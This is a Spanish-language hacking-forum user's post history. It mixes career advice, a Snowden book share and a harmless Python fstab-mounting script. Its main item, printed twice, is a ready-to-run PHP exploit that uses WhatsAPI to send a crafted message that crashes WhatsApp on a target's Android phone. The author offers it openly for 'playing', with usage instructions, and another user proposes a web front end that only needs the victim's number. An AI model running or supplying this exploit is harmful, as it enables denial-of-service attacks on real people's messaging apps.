Si estas apurado y tu problema es conseguir laburo, hace algun curso o certificacion en programacion, son caros, pero siempre sirven, y partir de ahi empeza a postularte mientras codeas algo tranqui como para practicar y tenerlo (un blog, carrito, ecommerse, etc). Y como dijeron por ahi, la posta es ser autodidacta, darse maña, y estar al tanto de como y donde avanzan las nuevas tecnologias. Saludos.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Off Topic / Re:Alguien que haya estudiado analista de sistemas que me aconseje?
Noviembre 09, 2017, 03:23:34 PM #2
Dudas y pedidos generales / Re:Elegir entre JS o PHP
Septiembre 12, 2017, 11:40:35 PM
Depende de para que lado quieras orientar tu trabajo. PHP ya es medio obsoleto hoy en dia, pero te salva si queres hacer un sistema local. Pero la tendencia para web es ReactJS y Angular
#3
Dudas y pedidos generales / Re:Duda de modelos en django
Agosto 20, 2017, 09:37:07 PM
No entendi bien que tiene que ver tu pregunta con el titulo del thread ... Pero me imagino que por ser un monstruo en el mundo, facebook debe tener algun concepto nuevo customizado sobre la arquitectura de su db (noSQL, mongo, etc). Igualmente en internet hay varios modelos de como implementar una estructura relacionada para una db aplicada a red social. Saludos.
#4
Dudas y pedidos generales / Re:Practica de pentest
Agosto 03, 2015, 10:01:12 PM
Espero que te sirva
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Dudas y pedidos generales / Re:[Ayuda] Remover uso de MD5 de Foros vBulletin.
Julio 14, 2015, 01:34:09 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaJAJAJAJAJAJAJAA
#6
Off Topic / Re:Tu ejemplo a seguir..
Julio 03, 2015, 12:03:08 AM
Mi único mentor en esta vida @No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
#7
Cursos, manuales y libros / [PDF] Snowden - Sin un lugar donde esconderse
Mayo 19, 2015, 06:03:38 PM
Algo cortito pero interesante; les dejo el link para descargar el libro SNOWDEN: SIN UN LUGAR DONDE ESCONDERSE de Gleen Greenwald. Libro que habla sobre Edward Snowden, la NSA y el estado de vigilancia de EEUU.
Esta muy bueno y entretenido sobre todo. Lo recomiendo para que se hagan un tiempito y lo lean.
El zip contiene la version del libro en PDF, EPUB y MOBI. Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esta muy bueno y entretenido sobre todo. Lo recomiendo para que se hagan un tiempito y lo lean.
El zip contiene la version del libro en PDF, EPUB y MOBI. Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Android / Re:[PHP] Crashear WhatsApp usando WhatsAPI
Febrero 05, 2015, 11:46:00 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaAdelante, todo tuyo. La idea es esa, compartir y que les sirva a los demas. Saludos.
Esto esta mas que genial bro, se me ocurre que se podria una api con html que haga falta solo poner el numero, si me das permiso de usar tu code me pongo a ello, no hace falta decir que con creditos tanto en la web como en el post para underc0de.
#10
Android / Re:[PHP] Crashear WhatsApp usando WhatsAPI
Febrero 05, 2015, 06:14:12 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3
Saludos!Código: php <?php
/*
* Title: WhatsApp Remote Crash with PHP
* Product: WhatsApp
* Vendor Homepage: http://www.whatsapp.com
* Vulnerable Version(s): 2.11.476
* Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
* Mirror: http://pastebin.com/Ktu45GN0
* Date: 05/02/2015
*
* Author Exploit:
* Rodrigo Avila - @el_rodrix - <[email protected]>
* Credits:
* Daniel Godoy - @0xhielasangre - <[email protected]>
* Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
*
* Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
* http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
* http://www.exploit-db.com/exploits/35637/
* http://www.exploit-db.com/exploits/32865/
*
* Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
* It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
* engaging in an interactive conversation over WhatsApp protocol
*/
require 'src/whatsprot.class.php';
function fgets_u($pStdn)
{
$pArr = array($pStdn);
if (false === ($num_changed_streams = stream_select($pArr, $write = NULL, $except = NULL, 0))) {
print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
return FALSE;
} elseif ($num_changed_streams > 0) {
return trim(fgets($pStdn, 1024));
}
return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
if ($argc < 2) {
echo $usage;
exit(1);
}
if (is_numeric($_SERVER['argv'][1])){
if (strlen($_SERVER['argv'][1]) == 13){
$dst = $_SERVER['argv'][1];
echo "[] Logging in as '$nickname' ($sender)\n";
$wa = new WhatsProt($sender, $imei, $nickname, false);
$wa->connect();
$wa->loginWithPassword($password);
echo "\n[] Send message to $dst: $msg\n";
$wa->sendMessage($dst , $msg);
echo "\n";
exit(0);
}else{
echo $usage;
}
}else{
echo $usage;
}
Corregido!. Gracias.
#11
Android / Re:[PHP] Crashear WhatsApp usando WhatsAPI
Febrero 05, 2015, 10:11:55 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD
Saludos!
ANTRAX
Gracias. La idea es esa, jugar jaja. Saludos
#12
Android / [PHP] Crashear WhatsApp usando WhatsAPI
Febrero 05, 2015, 09:52:54 AM
Que tal?. Les traigo un pequeño script en php que crashea el app de whatsapp en Android, que hasta el día de la fecha funciona. Pero esta vez usando un API en php de whatsapp; WhatsAPI.
Modo de uso de script
Código: php
Recuerden que el num de contacto que van a crashear debe ser de 13 dígitos. En la variable $msg deben copiar y pegar el contenido del pastebin que dejo en el comentario, donde se encuentran los caracteres especiales para crashear whatsapp.
Código: php
Adjunto screenshot del momento que crashea el app de whatsapp en Android. Para esta PoC se utilizo un Samsung Galaxy S4, con WhatsApp+ v6.65.
Información del dispositivo:
WhatsApp+ crashea:
WhatsApp+ crashea:
Información de WhatsApp app:
Espero que les guste. Saludos.
Modo de uso de script
root@rodrix:~# php wacrash.php 549XXXXXXXXXXRecuerden que el num de contacto que van a crashear debe ser de 13 dígitos. En la variable $msg deben copiar y pegar el contenido del pastebin que dejo en el comentario, donde se encuentran los caracteres especiales para crashear whatsapp.
<?php
/*
* Title: WhatsApp Remote Crash with PHP
* Product: WhatsApp
* Vendor Homepage: http://www.whatsapp.com
* Vulnerable Version(s): 2.11.476
* Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
* Mirror: http://pastebin.com/Ktu45GN0
* Date: 05/02/2015
*
* Author Exploit:
* Rodrigo Avila - @el_rodrix - <[email protected]>
* Credits:
* Daniel Godoy - @0xhielasangre - <[email protected]>
* Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
*
* Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
* http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
* http://www.exploit-db.com/exploits/35637/
* http://www.exploit-db.com/exploits/32865/
*
* Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
* It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
* engaging in an interactive conversation over WhatsApp protocol
*/
require 'src/whatsprot.class.php';
function fgets_u($pStdn)
{
$pArr = array($pStdn);
if (false === ($num_changed_streams = stream_select($pArr, $write = NULL, $except = NULL, 0))) {
print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
return FALSE;
} elseif ($num_changed_streams > 0) {
return trim(fgets($pStdn, 1024));
}
return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
if ($argc < 2) {
echo $usage;
exit(1);
}
if (is_numeric($_SERVER['argv'][1])){
if (strlen($_SERVER['argv'][1]) == 13){
$dst = $_SERVER['argv'][1];
echo "[] Logging in as '$nickname' ($sender)\n";
$wa = new WhatsProt($sender, $imei, $nickname, false);
$wa->connect();
$wa->loginWithPassword($password);
echo "\n[] Send message to $dst: $msg\n";
$wa->sendMessage($dst , $msg);
echo "\n";
exit(0);
}else{
echo $usage;
}
}else{
echo $usage;
}
Adjunto screenshot del momento que crashea el app de whatsapp en Android. Para esta PoC se utilizo un Samsung Galaxy S4, con WhatsApp+ v6.65.
Información del dispositivo:
WhatsApp+ crashea:
WhatsApp+ crashea:
Información de WhatsApp app:
Espero que les guste. Saludos.
#13
Python / Re:SMF Incorrect Flood Filter Headers
Agosto 23, 2014, 09:02:00 AM
Grande dani. Gracias por compartir. Y como decia un gran amigo mio, "a la gilada ni cabida, yo la miro desde arriba".
#14
Dudas y pedidos generales / Re:Ayuda con $Recycle.Bin
Abril 11, 2014, 10:31:51 PM
hace mil años tengo esas carpetas en las dos particiones de win y siguen ahi y todavia no las pude eliminar
#15
Python / Montar disco duro automaticamente al iniciar linux
Abril 03, 2014, 10:20:56 AM
La idea surgió porque, en mi notebook, tengo toda la música almacenada en una partición para datos (disco D: en NTFS), y cada vez que inicio linux (Debian Wheezy), tengo que montar esa partición para escuchar música. Lo mismo sucede cuando hago una lista de reproducción, necesito montar esa partición.
Entonces se me ocurrió codear un script en python que me permita automatizar el proceso de montar el disco una sola vez y que lo haga cada vez que iniciemos el sistema.
Básicamente, lo que hace el script es crear una carpeta en /media/ con el nombre DATOS, listar las particiones disponibles con el comando fdisk para almacenar el nombre de la unidad en una lista, y luego, junto con su sistema de archivo correspondiente (NTFS, FAT o FAT32) agregarlos a una nueva linea al archivo /etc/fstab/ para que se puedan montar todas las unidades listadas en ese archivo fstab con el comando mount -a
El script se debe correr con permiso sudo, ya que necesito listar las particiones y montarlas con privilegio.
Instrucciones: Se debe listar si o si las particiones (con la opcion 1) para luego setear los valores de unidad y sistema de archivos (opcion 2) de la particion que queremos montar.
Por el momento el script me permite montar solo una particion. Si se copan, pueden agregar un menu mas para montar varias particiones.
Les dejo el código para que lo vean y analicen y todo eso.
Código: python
Saludos !
P.D.: el menu lo hurte de un script que subieron a Underc0de
Entonces se me ocurrió codear un script en python que me permita automatizar el proceso de montar el disco una sola vez y que lo haga cada vez que iniciemos el sistema.
Básicamente, lo que hace el script es crear una carpeta en /media/ con el nombre DATOS, listar las particiones disponibles con el comando fdisk para almacenar el nombre de la unidad en una lista, y luego, junto con su sistema de archivo correspondiente (NTFS, FAT o FAT32) agregarlos a una nueva linea al archivo /etc/fstab/ para que se puedan montar todas las unidades listadas en ese archivo fstab con el comando mount -a
El script se debe correr con permiso sudo, ya que necesito listar las particiones y montarlas con privilegio.
Instrucciones: Se debe listar si o si las particiones (con la opcion 1) para luego setear los valores de unidad y sistema de archivos (opcion 2) de la particion que queremos montar.
Por el momento el script me permite montar solo una particion. Si se copan, pueden agregar un menu mas para montar varias particiones.
Les dejo el código para que lo vean y analicen y todo eso.
#!/usr/bin/python
from pexpect import run
from re import split
import os
class Crear:
divline = "*"*80
def listar(self):
self.valor = []
part = "/dev/sda"
stdout = split("\n", run("fdisk -l"))
print self.divline
print "Listado de Tabla de Particiones"
print self.divline
#print self.divline
for e in stdout:
for x in range(1,10):
if part + str(x) in e:
#agrego cadena a la lista
self.valor.append(part + str(x))
#guardo la longitud de la lista
total = len(self.valor)
print "Opcion " + str(total) + ": " + e
def menu(self):
while (1):
print("""
****************************************
* Montar particion al iniciar SO *
* por Rodrigo Avila - @el_rodrix *
* [email protected] *
****************************************
Menu
------
1 - Listar tabla de particiones
2 - Montar particion en /media/DATOS
x - salir
""")
opc = raw_input("Opcion: ")
if (opc == "1"):
self.listar()
elif (opc == "2"):
self.montar()
elif (opc.lower() == "x"):
print "Bye !"
exit()
else:
print "Opcion no valida"
print self.divline
pausa = raw_input("presiona ENTER para continuar")
def set_particion(self):
self.opcion1 = raw_input("Ingrese particion a montar: ")
try:
self.sda = int(self.opcion1) - 1
print self.divline
print "Particion a montar: " + self.valor[self.sda]
print self.divline
except:
print "Opcion no valida"
exit(0)
def set_sist_archivo(self):
self.sist_archivo = ['ntfs', 'fat', 'fat32']
texto = "Opcion: "
codigo = 0
print self.divline
print "Sistema de archivo - Elegir una Opcion"
print self.divline
for x in self.sist_archivo:
texto += '(%d)%s ' % (codigo, x)
codigo = codigo + 1
texto += ": "
self.opcion2 = raw_input(texto)
try:
print self.divline
print "Sistema de archivo: " + self.sist_archivo[int(self.opcion2)]
print self.divline
except:
print "Opcion no valida"
exit(0)
def verificar_dir(self):
try:
os.stat("/media/DATOS")
except:
pass
else:
print "Ya existe particion montada"
exit(0)
def crear_dir(self):
try:
fichero = split("\n", run("mkdir /media/DATOS"))
print self.divline
print "Carpeta /media/DATOS creada correctamente"
print self.divline
pass
except:
print "Error al crear directorio"
exit(0)
def set_path(self):
self.verificar_dir()
self.crear_dir()
self.path = '%s /media/DATOS %s auto,rw,exec,users,dmask=000,fmask=111,nls=utf8 0 0' % (self.valor[self.sda], self.sist_archivo[int(self.opcion2)])
print self.path
def agregar_path(self):
try:
with open('/etc/fstab', 'r+') as fstab:
fstab.read()
fstab.write(self.path)
print self.divline
print "Se agrego path correctamente"
print self.divline
except:
print "Error al escribir archivo fstab"
exit(0)
def set_montar(self):
try:
fichero2 = split("\n", run("mount -a"))
print self.divline
print "Particion montada correctamente"
print self.divline
except:
print "Error al montar particion"
exit(0)
def montar(self):
self.set_particion()
self.set_sist_archivo()
self.set_path()
self.agregar_path()
self.set_montar()
#metodo constructor
def __init__(self):
self.menu()
#instanciar clase
crear = Crear()
Saludos !
P.D.: el menu lo hurte de un script que subieron a Underc0de
#16
Pentesting / Re:[En Desarrollo][#Beastie - Multiple CMS Scaner - Toolkit]
Febrero 28, 2013, 08:53:05 PM
genial man !
#17
Bugs y Exploits / Re:Vulnerabilidad en wordpress
Febrero 09, 2013, 11:34:49 PM
A mi tambien me interesaria saber que se puede hacer con esta vulnerabilidad
Páginas1
